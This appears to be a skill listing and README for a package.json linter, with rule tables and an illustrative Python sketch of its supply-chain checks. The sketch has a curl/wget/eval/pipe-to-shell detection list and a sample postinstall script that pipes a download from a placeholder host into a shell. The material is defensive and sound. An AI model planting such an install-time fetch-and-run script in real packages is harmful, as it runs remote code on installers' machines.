Install
openclaw skills install @charlie-morrison/package-json-linter
Lint and validate package.json files for common mistakes, missing fields, security issues, and best practices. Use when asked to lint, validate, audit, or check package.json files, Node.js project configs, or npm package metadata. Triggers on "lint package.json", "check package", "validate npm", "audit package.json", "package issues".
Lint package.json files for missing fields, dependency issues, security risks, and best practices violations.
All commands use the bundled Python script at scripts/package_json_linter.py.
python3 scripts/package_json_linter.py lint <file-or-directory> [--strict] [--format text|json|markdown]
Runs all lint rules against one or more package.json files. If given a directory, scans for package.json files recursively (excluding node_modules).
Flags:
--strict — exit code 1 on any warning (not just errors)
--format — output format: text (default), json, markdown
python3 scripts/package_json_linter.py security <file-or-directory> [--format text|json|markdown]
Checks for supply chain risks: postinstall/preinstall/install scripts, and scripts containing curl, wget, eval, or piping to shell.
python3 scripts/package_json_linter.py scripts <file-or-directory> [--format text|json|markdown]
Analyzes the scripts section for missing common scripts (test, start, build), placeholder test scripts, dependency issues, and deprecated packages.
python3 scripts/package_json_linter.py validate <file-or-directory> [--strict] [--format text|json|markdown]
Validates required fields (name, version, description), semver format, npm naming rules, dependency issues, and best practice fields.

| Rule | Severity | Description |
|---|---|---|
| missing-name | error | No name field |
| missing-version | error | No version field |
| invalid-name | error | Name doesn't match npm naming rules |
| invalid-version | error | Version not valid semver |
| missing-description | warning | No description field |

| Rule | Severity | Description |
|---|---|---|
| wildcard-dependency | error | Version is *, empty, or latest |
| git-dependency | warning | Points to git URL (fragile) |
| file-dependency | warning | Uses file: protocol |
| pinned-dependency | info | All deps pinned to exact versions |
| duplicate-dependency | warning | Same package in deps and devDeps |
| deprecated-package | warning | Known deprecated package (~20 tracked) |

| Rule | Severity | Description |
|---|---|---|
| postinstall-script | warning | Supply chain risk |
| preinstall-script | warning | Supply chain risk |
| install-script | warning | Supply chain risk |
| suspicious-script | warning | Contains curl/wget/eval/pipe-to-shell |
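
The security rules in the table above can be sketched as follows. This is an added example, not the code of the bundled scripts/package_json_linter.py; the regex patterns, the check_scripts function, the parse-error rule name and the sample manifest are assumptions made for illustration.

```python
import json
import re

# Lifecycle hooks that npm runs automatically during install, mapped to the page's rule names.
LIFECYCLE_RULES = {
    "preinstall": "preinstall-script",
    "install": "install-script",
    "postinstall": "postinstall-script",
}

# Assumed patterns for "curl/wget/eval/pipe-to-shell"; the bundled script may match differently.
SUSPICIOUS = [
    ("curl", re.compile(r"\bcurl\b")),
    ("wget", re.compile(r"\bwget\b")),
    ("eval", re.compile(r"\beval\b")),
    ("pipe-to-shell", re.compile(r"\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b")),
]


def check_scripts(package_json_text):
    """Return a list of (rule, severity, script_name, detail) findings."""
    try:
        manifest = json.loads(package_json_text)
    except json.JSONDecodeError as exc:
        return [("parse-error", "error", "", str(exc))]  # hypothetical rule name
    scripts = manifest.get("scripts") if isinstance(manifest, dict) else None
    if not isinstance(scripts, dict):
        return []  # no scripts section: nothing for the security rules to flag
    findings = []
    for name, command in scripts.items():
        if not isinstance(command, str):
            continue
        if name in LIFECYCLE_RULES:
            findings.append((LIFECYCLE_RULES[name], "warning", name, "runs automatically on npm install"))
        hits = [label for label, pattern in SUSPICIOUS if pattern.search(command)]
        if hits:
            findings.append(("suspicious-script", "warning", name, ", ".join(hits)))
    return findings


# Constructed sample manifest (not from a real package).
SAMPLE = """{"name": "example-pkg", "version": "1.0.0", "scripts": {
  "postinstall": "curl -s https://example.invalid/setup.sh | sh",
  "build": "tsc -p .", "test": "node test.js"}}"""

if __name__ == "__main__":
    for finding in check_scripts(SAMPLE):
        print(finding)
```

Keyword matching of this kind is a triage heuristic: a flagged script still needs a human read, and a lifecycle script with no flagged keyword can still call a file that does the download.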

| Rule | Severity | Description |
|---|---|---|
| missing-license | warning | No license field |
| missing-repository | info | No repository field |
| missing-engines | info | No engines field |
| missing-keywords | info | No keywords field |
| missing-main | info | No main or exports field |
| missing-scripts | info | No scripts section |
| non-https-url | warning | URLs not using HTTPS |

Exit codes:
0 — no errors found
1 — errors found (or warnings in --strict mode)

Output formats:
text — human-readable, one issue per line (default)
json — structured JSON with summary counts
markdown — table format for reports and PRs